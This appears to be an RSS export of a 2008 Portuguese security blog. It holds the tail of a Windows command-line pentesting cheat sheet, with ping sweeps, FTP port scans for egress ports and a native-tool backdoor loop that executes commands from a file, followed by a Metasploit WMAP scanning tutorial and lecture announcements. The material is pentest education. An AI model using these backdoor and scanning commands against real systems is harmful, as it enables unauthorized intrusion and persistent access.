<p>Aqui não preisamos do (cmd.exe /c) a saída será enviada para o arquivo especificado, atenção para o caractere (<strong>^</strong>).</p>
<p>Agendando tarefas para executar todos os dias (sim, ta tosco mas não consegui nada mais bonito):</p>
<p><strong>C:\&gt; at 00:00 /EVERY:1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 cmd.exe /c c:\script.bat</strong></p>
<p>Limpando as todas as tarefas:</p>
<p><strong>C:\&gt; at /del /y</strong></p>
<p> </p>
<p><strong>ALGUMAS BRINCADEIRAS QUE SE TORNAM POSSÍVEL QUANDO CONHECEMOS OS COMANDOS ACIMA</strong></p>
<p>Varredura clássica &#8220;Ping Sweep&#8221;:</p>
<p><strong>C:\&gt; for /L %i in (1,1,255) do @ping -n 1 -w 2000 192.168.1.%i &gt;nul &amp;&amp; @echo UP: 192.168.1.%i &gt;&gt; scan.txt</strong></p>
<p>O símbolo arroba (<strong>@</strong>) no serve para &#8220;esconder&#8221; o comando quando executado.</p>
<p>Consultando DNS:</p>
<p><strong>C:\&gt; nslookup 192.168.1.10</strong></p>
<p><strong>(&#8230;)</strong></p>
<p><strong>Nome =   blackbox.localdomain.com.br</strong></p>
<p><strong>(&#8230;)</strong></p>
<p>Importante lembrar que isto serve tanto para LAN quanto WAN, bastando o servidor de DNS estar configurado corretamente.</p>
<p>Varredura de DNS reverso:</p>
<p><strong>C:\&gt; for /L %i in (1,1,255) do @nslookup 192.168.1.%i 2&gt;null | find &#8220;Nome&#8221; &amp;&amp; echo 192.168.1.%i</strong></p>
<p>Varredura de porta usando windows FTP:</p>
<p><strong>C:\&gt; for /L %i in (1,1,1024) do echo verificando porta: %i &gt;&gt; ports.txt &amp;&amp; echo open 192.168.1.103 %i &gt; ftp.txt &amp; echo quit &gt;&gt; ftp.txt &amp; ftp -s:ftp.txt 2&gt;&gt; ports.txt</strong></p>
<p>Procurando por uma porta aberta de dentro para fora da rede, muito útil quando precisamos de uma conexão reversa:</p>
<p><strong>C:\&gt; for /L %i in (1,1,1024) do echo verificando porta: %i &gt;&gt; ports.txt &amp;&amp; echo open [IP externo] %i &gt; ftp.txt &amp; echo quit &gt;&gt; ftp.txt &amp; ftp -s:ftp.txt 2&gt;&gt; ports.txt</strong></p>
<p> </p>
<p><strong>BACKDOOR UTILIZANDO FERRAMENTAS NATIVAS</strong></p>
<p>Um dos principais motivos que estudei cada comando e criei diversas situações no prompt do windows, foi com o propósito de criar situações reais de intrusão, onde temos somente o prompt e nada mais e também não podemos instalar ferramentas, no exemplo abaixo é uma forma que encontrei para criar um backdoor:</p>
<p><strong>C:\&gt; for /L %i in (,,,) do (for /F &#8220;delims=^&#8221; %j in (commands.txt) do cmd.exe /c %j &gt;&gt; output.txt &amp; del commands.txt) &amp; ping -n 2 127.0.0.1</strong></p>
<p>Com este &#8220;<strong>For</strong>&#8221; sendo executado em loop infinito, cada comando que <strong>enviarmos</strong> para o arquivo &#8220;<strong>commands.txt</strong>&#8221; (<strong>vide: Transferindo/Criando arquivos</strong>), será executado no servidor.</p>
<p>Mérito destes últimos para Ed Skoudis da SANS pelo exclente Webinar.</p>
<p> </p>
<p>A lista de comandos acima não é completa e nem tampouco uma referência perfeita, sei que muitos dos comandos acima podem ser re-escritos de forma diferente mas estas foram as formas que aprendi e usei(sob demanda), portanto fiquem a vontade para corrigir e acrescentar comandos que não citei e que são importantes em um teste de intrusão.</p>
<p>Também não abordei qual pode ser usado como usuário comum e qual deve ser utilizado pelo admin (sorry).</p>
<p>Não sou um super conhecedor dos registros do windows mas sei me virar, e também sei que da pra fazer coisas NINJA com ele principalmente usando a linha de comando, por favor quem souber postem nos comentarios pois pretendo em breve criar um post parecido como este mas falando somente como manipular os registros via linha de comando.</p>
<p>Espero que a referência acima sirva para outras pessoas assim como serve pra mim.</p>
<p><strong>Enjoy! ;)</strong></p>
<p><strong><br />
</strong></p>
Posted in Article Tagged: Hacking, Security, Windows <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ulissescastro.wordpress.com/129/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ulissescastro.wordpress.com/129/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ulissescastro.wordpress.com/129/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ulissescastro.wordpress.com/129/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ulissescastro.wordpress.com/129/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ulissescastro.wordpress.com/129/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ulissescastro.wordpress.com/129/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ulissescastro.wordpress.com/129/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ulissescastro.wordpress.com/129/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ulissescastro.wordpress.com/129/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=129&subd=ulissescastro&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://ulissescastro.wordpress.com/2008/12/08/windows-command-line-for-pentesters/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/38efa560b5626bd38456fa15af48a004?s=96&#38;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96" medium="image">
			<media:title type="html">thebug</media:title>
		</media:content>

		<media:content url="http://ulissescastro.files.wordpress.com/2008/12/swissarmyknife.jpg" medium="image">
			<media:title type="html">swissarmyknife</media:title>
		</media:content>

		<media:content url="http://ulissescastro.files.wordpress.com/2008/12/sq.jpeg" medium="image">
			<media:title type="html">sq</media:title>
		</media:content>
	</item>
		<item>
		<title>WMAP: Power of Metasploit and Ratproxy</title>
		<link>http://ulissescastro.wordpress.com/2008/11/25/wmap-power-of-metasploit-and-ratproxy/</link>
		<comments>http://ulissescastro.wordpress.com/2008/11/25/wmap-power-of-metasploit-and-ratproxy/#comments</comments>
		<pubDate>Tue, 25 Nov 2008 06:05:40 +0000</pubDate>
		<dc:creator>ulissescastro</dc:creator>
				<category><![CDATA[Article]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Metasploit]]></category>
		<category><![CDATA[Web]]></category>

		<guid isPermaLink="false">http://ulissescastro.wordpress.com/?p=119</guid>
		<description><![CDATA[Ae! Demoro mais voltei, agora escrevendo um pouco sobre análise de vulnerabilidades em aplicações web, de acordo com o título e sendo eu um chatão que gosta de colocar tudo nos míiiiiiiiiiiiiiinimos detalhes, deveria começar desmembrando o mestaploit e logo o ratproxy, mas UFA! Não vou precisar :)
Wagner, fez uma excelente abordagem de como o [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=119&subd=ulissescastro&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Ae! Demoro mais voltei, agora escrevendo um pouco sobre análise de vulnerabilidades em aplicações web, de acordo com o título e sendo eu um chatão que gosta de colocar tudo nos míiiiiiiiiiiiiiinimos detalhes, deveria começar desmembrando o mestaploit e logo o ratproxy, mas <strong>UFA!</strong> Não vou precisar :)</p>
<p><strong>Wagner</strong>, fez uma excelente abordagem de como o <a href="http://wagnerelias.com/2008/10/22/um-pouco-sobre-o-ratproxy/">ratproxy</a> funciona há um tempo atraz, <strong>Luiz Vieira</strong>  fez uma <a href="http://imasters.uol.com.br/artigo/10645/seguranca/metasploit_framework_-_parte_01/">abordagem inicial sobre o metasploit</a>, portanto para o bom entendimento deste post recomendo a leitura de ambos ou se você já tem o conhecimento dos dois softwares citados prepare-se pois, <a href="http://en.wikipedia.org/wiki/H_D_Moore">HD Moore</a> e seus comparsas deram mais um passo rumo a dominação do mundo.</p>
<p>Vou falar do recente lançado <a href="http://www.metasploit.com/dev/trac/browser/framework3/trunk/documentation/wmap.txt">WMAP</a>, a idéia principal é de um &#8220;Web Application Scanner&#8221; dentro do Metasploit para automação, busca de falhas e a exploração das mesmas, mantendo uma abordagem simples, prática e diferente de outras ferramentas como w3af, acunetix entre outras&#8230;</p>
<p>A topologia fica assim:</p>
<p><code>[CLIENT] ----- [ATTACK PROXY] -----    [TARGET]<br />
                      |                 ^<br />
              [METASPLOIT DB]           |<br />
                      |                 |<br />
           [MSF 3 - WMAP SCANNER]       |<br />
           [MSF 3 - WMAP MODULES]  -----+</code></p>
<p>Recomendo utilizar sempre a última versão do Metaploit a partir do SVN, para que possa contribuir para o projeto encontrando bugs, corrigindo, ajudando a testar e etc&#8230;</p>
<p><em>- Mas Ulisses eu não sou programador!</em></p>
<p>E quem disse que precisa ser programador pra arrumar &#8220;scripts&#8221; em Ruby?! Dúvida? <a href="http://www.metasploit.com/dev/trac/changeset/5662">aqui a prova</a>!  ;P</p>
<p>Deixa de lerolero e vamos pra pancada, a primeira pergunta que surge é:</p>
<p><em>- OK, bacana e na prática?</em></p>
<p>Baixe o Metasploit, escolha um diretório ninja onde guarda suas ferramentas e:</p>
<p><code>svn co http://metasploit.com/svn/framework3/trunk/ framework3</code></p>
<p>Agora o querido ratproxy:</p>
<p><code>wget http://ratproxy.googlecode.com/files/ratproxy-1.51.tar.gz<br />
tar xvzf http://ratproxy.googlecode.com/files/ratproxy-1.51.tar.gz</code></p>
<p>É preciso aplicar um patch no ratproxy para que ele possa armazenar seus resultados em um database criado com sqlite3 (sim, sim, para compilar você vai precisar dos arquivos de desenvolvimento do sqlite3). Ah! Logo vão entender o porque do sqlite3&#8230;</p>
<p>Copie o patch:</p>
<p><code>cp /diretórioninjadeferramentas/framework3/external/ratproxy/ratproxy_wmap.diff .</code></p>
<p>Aplique o patch:</p>
<p><code>patch -d /diretórioninjadeferramentas/framework3/external/ratproxy &lt; ratproxy_wmap.diff</code></p>
<p>Bora compilar:</p>
<p><code>cd ratproxy<br />
make</code></p>
<p>Beleza tudo pronto, metasploit versao svn instalado, ratproxy com patch aplicado. Antes de ir pra brincadeira, vamos entender o seguinte, você irá utilizar o ratproxy como proxy (:-o) e ele vai guardar os logs em um arquivo no formato sqlite, o metasploit vai ler este arquivo e a partir disso vai lançar os seguintes ataques (os nomes são dedutíveis):</p>
<p>WMAPScanServer, WMAPScanDir, WMAPScanFile<br />
WMAPScanUniqueQuery, WMAPScanQuery, WMAPScanBody<br />
WMAPScanHeaders, WMAPScanGeneric</p>
<p>A descrição detalhada você consegue utilizando o help do metasploit.</p>
<p>Coloque o ratproxy para funcionar da seguinte maneira:</p>
<p><code>$ ./ratproxy -v /Users/ucastro/.msf3/ -b wmaptest.db -a<br />
ratproxy version 1.51-beta by &lt;lcamtuf@google.com&gt;<br />
[*] Proxy configured successfully. Have fun, and please do not be evil.<br />
[+] Accepting connections on port 8080/tcp (local only)...</code></p>
<p>Ele ficará ouvindo na port 8080, configure seu browser e navegue um pouco pelo site que quer auditar (eita palavra bunita).</p>
<p>Agora entre no metastploit, e execute os seguinte comandos:</p>
<p><code>$ ./msfconsole<br />
msf &gt; load db_sqlite3<br />
msf &gt; load db_wmap<br />
[*] =[ WMAP v0.2 - ET LoWNOISE<br />
[*] Successfully loaded plugin: db_wmap</code></p>
<p>Conecte no banco de dados que &#8220;populou&#8221; com o ratproxy enquanto navegava.</p>
<p><code>msf &gt; db_connect /Users/castro/.msf3/wmaptest.db<br />
[*] Successfully connected to the database<br />
[*] File: /Users/castro/.msf3/wmaptest.db</code></p>
<p>Atualize a lista de acordo com o bd:</p>
<p><code>msf &gt; wmap_targets -r<br />
[*] Reloading targets...<br />
[*] Added. 192.168.1.1 80 0<br />
[*] Added. 192.168.2.10 80 0<br />
[*] Added. 192.168.5.11 80 0<br />
[*] Added. 192.168.1.3 80 0</code></p>
<p>Liste o IP dos sites que navegou:</p>
<p><code>msf &gt; wmap_targets -p<br />
[*]    Id. Host                     Port    SSL<br />
[*]    1. 192.168.1.1               80   <br />
[*]    2. 192.168.2.10             80   <br />
[*]    3. 192.168.5.11              80   <br />
[*]    4. 192.168.1.3               80   <br />
[*] Done.</code></p>
<p>Selecione o alvo a ser auditado: :)</p>
<p><code>msf &gt; wmap_targets -s 2   <br />
msf &gt; wmap_targets -p<br />
[*]    Id. Host                     Port    SSL<br />
[*]    1. 192.168.1.1               80   <br />
[*] =&gt; 2. 192.168.2.10              80   <br />
[*]    3. 192.168.5.11               80   <br />
[*]    4. 192.168.1.3               80   <br />
[*] Done.</code></p>
<p>Podemos ver com o comando abaixo a estrutura capturada:</p>
<p><code>msf &gt; wmap_website<br />
[*] Website structure<br />
[*] 192.168.2.10:80 SSL:0<br />
ROOT_TREE<br />
   +------ index.asp<br />
  |  images<br />
  |  +------ logo.gif<br />
     +------ login.asp<br />
     |       menu<br />
       |       +------ menu.asp<br />
       |       +------ logout.asp<br />
       |       +------ help.asp<br />
[*] Done.</code></p>
<p>Liste os módulos:</p>
<p><code>msf &gt; wmap_run -t<br />
[*] Loaded auxiliary/scanner/http/wmap_vhost_scanner ...<br />
[*] Loaded auxiliary/scanner/http/frontpage_login ...<br />
[*] Loaded auxiliary/scanner/http/version ...<br />
...<br />
[*] Loaded auxiliary/scanner/http/wmap_blind_sql_query ...<br />
[*] Analysis completed in 3.1337145306448364 seconds.<br />
[*] Done.</code></p>
<p>Para definir um novo valor para alguma varíavel de configuração utilize o comando (setg), definindo um único VHOST:</p>
<p><code>msf &gt; setg VHOST www.targetco.com<br />
VHOST =&gt; www.targetco.com</code></p>
<p>Ou um único domínio:                    </p>
<p><code>msf &gt; setg DOMAIN targetco.com<br />
DOMAIN =&gt; targetco.com</code><br />
A extensão utilizada pelo site:</p>
<p><code>msf &gt; setg EXT .asp<br />
EXT =&gt; .asp</code></p>
<p>Para iniciar os testes:</p>
<p><code>msf &gt; wmap_run -e<br />
[*] Launching auxiliary/scanner/http/wmap_vhost_scanner WMAP_SERVER against <br />
   www.target.com:80<br />
[*] Sending request with random domain rGvsV.targetco.com <br />
[*] NOT Found admin.targetco.com<br />
[*] NOT Found services.targetco.com<br />
[*] Vhost found webmail.targetco.com<br />
[*] NOT Found console.targetco.com<br />
[*] NOT Found apps.targetco.com<br />
[*] NOT Found mail.targetco.com<br />
[*] NOT Found intranet.targetco.com<br />
[*] NOT Found intra.targetco.com<br />
[*] NOT Found corporate.targetco.com<br />
[*] Launching auxiliary/scanner/http/frontpage WMAP_SERVER against <br />
     www.targetco.com:80<br />
[*] http://xxx.xxx.xxx.xxx:80 is running Apache<br />
[*] FrontPage not found on http://192.168.2.10:80 [302 Object Moved]<br />
...<br />
...<br />
[*] Done.</code></p>
<p>E ainda é possível gerar relatórios! :)</p>
<p>Ë bom ficar de olho pois o WMAP está bem no início, e logo se seguir os passos e o rítmo que o <a href="http://www.metasploit.com/">metasploit</a> vem conseguindo, principalmente na área de &#8220;bypass&#8221; em anti-vírus (assunto pra outro dia!) essa nova &#8220;feature&#8221; PROMETE! :)</p>
<p>Enjoy! ;)</p>
<p>Referências:</p>
<p>- <a href="http://code.google.com/p/ratproxy/wiki/RatproxyDoc">Ratproxy Docs</a></p>
<p>- <a href="http://www.metasploit.com/dev/trac/browser/framework3/trunk/documentation/wmap.txt">WMAP</a></p>
<p>- <a href="http://carnal0wnage.blogspot.com/2008/11/metasploit-and-wmap_24.html">Carnal0wnage</a></p>
Posted in Article Tagged: Hacking, Metasploit, Web <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ulissescastro.wordpress.com/119/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ulissescastro.wordpress.com/119/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ulissescastro.wordpress.com/119/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ulissescastro.wordpress.com/119/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ulissescastro.wordpress.com/119/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ulissescastro.wordpress.com/119/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ulissescastro.wordpress.com/119/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ulissescastro.wordpress.com/119/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ulissescastro.wordpress.com/119/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ulissescastro.wordpress.com/119/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=119&subd=ulissescastro&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://ulissescastro.wordpress.com/2008/11/25/wmap-power-of-metasploit-and-ratproxy/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/38efa560b5626bd38456fa15af48a004?s=96&#38;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96" medium="image">
			<media:title type="html">thebug</media:title>
		</media:content>
	</item>
		<item>
		<title>Palestras! Palestras! Palestras! :)</title>
		<link>http://ulissescastro.wordpress.com/2008/11/10/palestras-palestras-palestras/</link>
		<comments>http://ulissescastro.wordpress.com/2008/11/10/palestras-palestras-palestras/#comments</comments>
		<pubDate>Mon, 10 Nov 2008 13:27:32 +0000</pubDate>
		<dc:creator>ulissescastro</dc:creator>
				<category><![CDATA[Article]]></category>
		<category><![CDATA[Announce]]></category>
		<category><![CDATA[Lecture]]></category>
		<category><![CDATA[OWASP]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://ulissescastro.wordpress.com/?p=116</guid>
		<description><![CDATA[Infelizmente devido a falta do tempo não pude anunciar as palestras que ministrei neste sábado (08/11) no 1o. /dev/net que ocorreu em Goiânia, quero agradecer aos organizadores pelo convite e parabenizar pelo evento, foi ótimo! Obrigado também pra galera que lotou a sala e participou ativamente! :)
Apresentei junto com o Eduardo (Eth0) duas palestras, a [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=116&subd=ulissescastro&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Infelizmente devido a falta do tempo não pude anunciar as palestras que ministrei neste sábado (08/11) no <a href="http://www.aslgo.org.br/dev/net/">1o. /dev/net</a> que ocorreu em Goiânia, quero agradecer aos organizadores pelo convite e parabenizar pelo evento, foi ótimo! Obrigado também pra galera que lotou a sala e participou ativamente! :)</p>
<p>Apresentei junto com o <a href="http://webappsecurity.wordpress.com/">Eduardo (Eth0)</a> duas palestras, a primeira &#8220;SQL Injection in Depth&#8221; é uma versão/evolução das palestras de SQL Injection que venho apresentando mas desta vez bem mais didática, pois re-montamos a palestra separando alguns minutos para explicar no estilo &#8220;ao vivo&#8221; todos os comandos SQL utilizados para construir um ataque. Não deixamos de apresentar os clássicos videos de <a href="http://ulissescastro.wordpress.com/2008/10/23/palestra-sql-injection-attacks-disponibilizada/">&#8220;Apresentador Injection&#8221;</a> onde utilizamos para fazer analogia com o ataque. A palestra pode ser baixada <a href="http://ulissescastro.files.wordpress.com/2008/11/sql_injection_prof.pdf">aqui</a> e também vou providenciar para próxima semana o video da demonstração.</p>
<p>A segunda palestra que apresentamos foi o <a href="http://www.owasp.org/index.php/Top_10_2007">&#8220;OWASP &#8211; Top Ten&#8221;</a>, palestra que o Eth0 vem apresentando a bastante tempo e  impotante referenciar aqui que esta mesma palestra foi apresentda por <a href="http://www.leocavallari.com/">Leonardo Cavallari</a> e <a href="http://www.deigratia33.blogspot.com/">Marcos Aurélio Rodrigues</a> no <a href="http://fisl.softwarelivre.org/9.0/papers/pub/">FISL 9</a> e está disponível para <a href="http://www.owasp.org/images/7/75/OWASP_TOP10_PT-BR.ppt">download </a>no site da <a href="http://www.owasp.org">OWASP</a>, e se alguém se interessar o paper do Top Ten 2007 que foi traduzido para o português pelo pessoal da OWASP-BR pode baixá-lo <a href="http://www.owasp.org/images/4/42/OWASP_TOP_10_2007_PT-BR.pdf">aqui</a>.</p>
<p>Para quem não estava no evento e é da região (Brasí­lia &#8211; DF) estaremos nesta terça-feira a partir das 19:00h na FACITEC apresentando a palestra &#8220;OWASP &#8211; Top Ten&#8221; e no próximo sábado em Goiânia no evento <a href="http://www.itmeeting.com.br/pt-br/home.php">IT Meeting</a> com a palestra <strong>&#8220;Open Web Aplication Security Project &#8211; OWASP&#8221;</strong> falando tudo sobre o maior projeto de segurança do mundo. :)</p>
<p>Agradeço a todos que compareceram, e aos que comparecerão nos vemos em breve!</p>
<p>Enjoy! ;)</p>
Posted in Article Tagged: Announce, Lecture, OWASP, Security <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ulissescastro.wordpress.com/116/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ulissescastro.wordpress.com/116/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ulissescastro.wordpress.com/116/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ulissescastro.wordpress.com/116/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ulissescastro.wordpress.com/116/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ulissescastro.wordpress.com/116/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ulissescastro.wordpress.com/116/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ulissescastro.wordpress.com/116/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ulissescastro.wordpress.com/116/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ulissescastro.wordpress.com/116/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=116&subd=ulissescastro&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://ulissescastro.wordpress.com/2008/11/10/palestras-palestras-palestras/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/38efa560b5626bd38456fa15af48a004?s=96&#38;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96" medium="image">
			<media:title type="html">thebug</media:title>
		</media:content>
	</item>
		<item>
		<title>Palestra: &#8220;SQL Injection Attacks&#8221; disponibilizada</title>
		<link>http://ulissescastro.wordpress.com/2008/10/23/palestra-sql-injection-attacks-disponibilizada/</link>
		<comments>http://ulissescastro.wordpress.com/2008/10/23/palestra-sql-injection-attacks-disponibilizada/#comments</comments>
		<pubDate>Thu, 23 Oct 2008 14:19:55 +0000</pubDate>
		<dc:creator>ulissescastro</dc:creator>
				<category><![CDATA[Article]]></category>
		<category><![CDATA[Announce]]></category>
		<category><![CDATA[Lecture]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[SQLi]]></category>

		<guid isPermaLink="false">http://ulissescastro.wordpress.com/?p=113</guid>
		<description><![CDATA[No dia 21/10/2008 estive na Universidade UNISABER apresentando na Semana Acadêmica a palestra &#8220;SQL Injection Attacks&#8221; a mesma pode ser baixada aqui.
Ah ! Claro não podia esquecer de anexar neste post os CLÁSSICOS videos apresentados para analogia com SQL Injection / Validação de Entrada de Dados.
Para quem não conhece ainda, segue abaixo os videos de [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=113&subd=ulissescastro&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>No dia <strong>21/10/2008</strong> estive na <strong>Universidade UNISABER</strong> apresentando na Semana Acadêmica a palestra <strong>&#8220;SQL Injection Attacks&#8221;</strong> a mesma pode ser baixada <a href="http://ulissescastro.files.wordpress.com/2008/10/sql_injection_attacks.pdf">aqui</a>.</p>
<p>Ah ! Claro não podia esquecer de anexar neste post os <strong>CLÁSSICOS</strong> videos apresentados para analogia com <strong>SQL Injection / Validação de Entrada de Dados</strong>.</p>
<p>Para quem não conhece ainda, segue abaixo os videos de &#8220;<strong>COMENTARISTA INJECTION</strong>&#8220;.</p>
<p><span style="text-align:center; display: block;"><a href="http://ulissescastro.wordpress.com/2008/10/23/palestra-sql-injection-attacks-disponibilizada/"><img src="http://img.youtube.com/vi/6qhC74HMK0Q/2.jpg" alt="" /></a></span></p>
<p><span style="text-align:center; display: block;"><a href="http://ulissescastro.wordpress.com/2008/10/23/palestra-sql-injection-attacks-disponibilizada/"><img src="http://img.youtube.com/vi/GOANP07SMew/2.jpg" alt="" /></a></span></p>
<p>Obrigado a TODOS que compareceram, participaram e organizaram o evento.</p>
<p><strong>Enjoy! ;)</strong></p>
Posted in Article Tagged: Announce, Lecture, Security, SQLi <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ulissescastro.wordpress.com/113/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ulissescastro.wordpress.com/113/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ulissescastro.wordpress.com/113/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ulissescastro.wordpress.com/113/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ulissescastro.wordpress.com/113/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ulissescastro.wordpress.com/113/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ulissescastro.wordpress.com/113/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ulissescastro.wordpress.com/113/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ulissescastro.wordpress.com/113/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ulissescastro.wordpress.com/113/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=113&subd=ulissescastro&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://ulissescastro.wordpress.com/2008/10/23/palestra-sql-injection-attacks-disponibilizada/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/38efa560b5626bd38456fa15af48a004?s=96&#38;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D96" medium="image">
			<media:title type="html">thebug</media:title>
		</media:content>

		<media:content url="http://img.youtube.com/vi/6qhC74HMK0Q/2.jpg" medium="image" />

		<media:content url="http://img.youtube.com/vi/GOANP07SMew/2.jpg" medium="image" />
	</item>
		<item>
		<title>Eu amo Python!</title>
		<link>http://ulissescastro.wordpress.com/2008/10/17/eu-amo-python/</link>
		<comments>http://ulissescastro.wordpress.com/2008/10/17/eu-amo-python/#comments</comments>
		<pubDate>Sat, 18 Oct 2008 02:46:21 +0000</pubDate>
		<dc:creator>ulissescastro</dc:creator>
				<category><![CDATA[Article]]></category>
		<category><![CDATA[Development]]></category>
		<category><![CDATA[Python]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Tor]]></category>

		<guid isPermaLink="false">http://ulissescastro.wordpress.com/?p=111</guid>
		<description><![CDATA[Simplesmente não teve jeito, foi AMOR ao primeiro script!
Já havia lido um pouco sobre Python, mas não tinha tentado escrever algo, a linguagem é muito fácil de aprender recomendo a todos que não conhecem perder algumas horas brincando&#8230; a documentação é excelente e vasta!
Recomendo ler também os artigos publicados pela IBM, mais especificamente &#8220;Python for system [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ulissescastro.wordpress.com&blog=2380205&post=111&subd=ulissescastro&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Simplesmente não teve jeito, foi <strong>AMOR</strong> ao primeiro script!</p>
<p>Já havia lido um pouco sobre <a href="http://www.python.org">Python</a>, mas não tinha tentado escrever algo, a linguagem é muito fácil de aprender recomendo a todos que não conhecem perder algumas horas brincando&#8230; a documentação é excelente e <a href="http://www.python.org/doc/">vasta</a>!</p>
<p>Recomendo ler também os artigos publicados pela <a href="http://www.ibm.com">IBM</a>, mais especificamente <a href="http://www.ibm.com/developerworks/aix/library/au-python/">&#8220;Python for system administrators&#8221;</a> e outro para quem se interessa em brincar com sockets <a href="http://www.ibm.com/developerworks/edu/l-dw-linux-pysocks-i.html">&#8220;Sockets programming in Python&#8221;</a>, existem muitos outros artigos no site sobre Python, vale a pena conferir! ;)</p>
<p>Não posso deixar de comentar neste post que é imprescindível o conhecimento nesta linguagem para pessoas que tem segurança como hobbie ou profissão, as vantagens que ela traz são absurdas principalmente para automatizar tarefas em testes de intrusão, a soma de Python + <a href="http://johnny.ihackstuff.com/">Google Hacking</a> para levantamento de informações como dizia minha Vó: <strong>&#8220;É do pirú&#8221;</strong>. (não me pergunte pq ela dizia isso, não sei explicar, mas acho q siginifica algo como <strong>&#8220;PQP muito FODA&#8221;</strong>)</p>
<p>Nesta última semana dei uma boa mergulhada nos estudos e aprendi algumas coisas, e claro já quero compartilhar! :)</p>
<p>Segue dois scriptzinhos que fiz para facilitar um pouco a vida de quem gosta de usar <a href="http://www.torproject.org/">TOR</a>:</p>
<p>Neste abaixo criei para checar meu IP externo (sim sou preguiçoso e não gosto de entrar no site pra ver meu IP):</p>
<p> </p>
<p><code>$ cat checkip.py</code></p>
<p><code> </code></p>
<p><code>---------</p>
<p>#!/usr/bin/env python</p>
<p>import re, urllib, os</p>
<p>check_proxy = os.environ.get('http_proxy')</p>
